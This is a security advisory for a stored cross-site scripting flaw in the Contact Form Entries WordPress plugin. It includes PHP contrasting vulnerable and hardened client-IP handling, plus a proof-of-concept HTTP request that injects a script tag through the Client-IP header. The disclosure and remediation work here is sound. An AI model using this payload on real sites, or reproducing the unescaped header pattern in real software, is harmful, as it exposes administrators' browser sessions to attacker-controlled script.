
Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not validate, sanitise or escape the client IP address it reads from request headers such as Client-IP and X-Forwarded-For before storing it with the form entry and rendering it in the admin dashboard. Because those headers are fully attacker-controlled, an unauthenticated visitor can submit a form with an HTML payload in place of an IP address and have it execute in the browser of any logged-in admin who views the created entry (stored Cross-Site Scripting).
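The unsafe pattern the description refers to, next to a hardened version, as an added example that is not the plugin's own code. The function names, the trusted-proxy list and the sample $_SERVER arrays are assumptions; inside WordPress the output helper uses esc_html(), and it falls back to htmlspecialchars() so the script also runs from the PHP CLI.

```php
<?php
// Added example (not Contact Form Entries code). Names, the trusted-proxy
// list and the sample requests below are assumptions for illustration.

// Vulnerable pattern: the first proxy header present is stored verbatim and
// later echoed into the admin entry list unescaped.
function cfe_vulnerable_ip(array $server): string {
    foreach (['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'] as $key) {
        if (!empty($server[$key])) {
            return $server[$key]; // "<script>alert(/XSS/)</script>" passes straight through
        }
    }
    return '';
}

// Hardened: proxy headers are only consulted when the TCP peer is one of our
// own reverse proxies; every candidate must be a syntactically valid IP.
function cfe_client_ip(array $server, array $trusted_proxies): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (!in_array($remote, $trusted_proxies, true)) {
        // Direct connection: the forwarded headers are attacker-controlled, ignore them.
        return filter_var($remote, FILTER_VALIDATE_IP) !== false ? $remote : '';
    }
    $chain = [];
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        $chain = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    } elseif (!empty($server['HTTP_CLIENT_IP'])) {
        $chain = [trim($server['HTTP_CLIENT_IP'])];
    }
    // Walk from the hop nearest our proxy backwards; the first hop that is not
    // one of our proxies is the client. Anything the client prepended itself
    // sits further left and is never reached.
    for ($i = count($chain) - 1; $i >= 0; $i--) {
        if (in_array($chain[$i], $trusted_proxies, true)) {
            continue;
        }
        return filter_var($chain[$i], FILTER_VALIDATE_IP) !== false ? $chain[$i] : $remote;
    }
    return $remote;
}

// Escape at output time regardless of what was stored: esc_html() inside
// WordPress, htmlspecialchars() when run outside it.
function cfe_render_ip(string $ip): string {
    return function_exists('esc_html')
        ? esc_html($ip)
        : htmlspecialchars($ip, ENT_QUOTES, 'UTF-8');
}

// Constructed request mirroring the advisory's PoC header (direct connection).
$direct = [
    'REMOTE_ADDR'    => '203.0.113.7',
    'HTTP_CLIENT_IP' => '<script>alert(/XSS/)</script>',
];
// Constructed request arriving through an assumed trusted proxy at 10.0.0.2,
// with the client having prepended junk to X-Forwarded-For.
$proxied = [
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '<script>alert(1)</script>, 198.51.100.9',
];
$trusted = ['10.0.0.2'];

echo "vulnerable : ", cfe_vulnerable_ip($direct), PHP_EOL;          // payload stored as-is
echo "hardened   : ", cfe_client_ip($direct, $trusted), PHP_EOL;     // header ignored, peer is not a proxy
echo "proxied    : ", cfe_client_ip($proxied, $trusted), PHP_EOL;    // right-most untrusted hop wins
echo "rendered   : ", cfe_render_ip(cfe_vulnerable_ip($direct)), PHP_EOL; // escaped on output
```

Two fixes are needed, not one. Escaping on output closes the XSS, but storing whatever Client-IP or X-Forwarded-For says still lets any visitor choose the IP that gets logged, so those headers should only be honoured when REMOTE_ADDR is a reverse proxy the site operator controls.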

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, */*;q=0.1
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9885500162977152723644841236
Content-Length: 963
Connection: close
Client-IP: <script>alert(/XSS/)</script>
Cookie: vx_user=61c2ecea43ad6164016458635903967

-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7"

1376
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_version"

5.5.3
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f1376-p1701-o1
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_container_post"

1701
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"

3e8ce0f47face5a3318813e733c3c774
-----------------------------9885500162977152723644841236
Content-Disposition: form-data; name="text-42"

Test
-----------------------------9885500162977152723644841236--
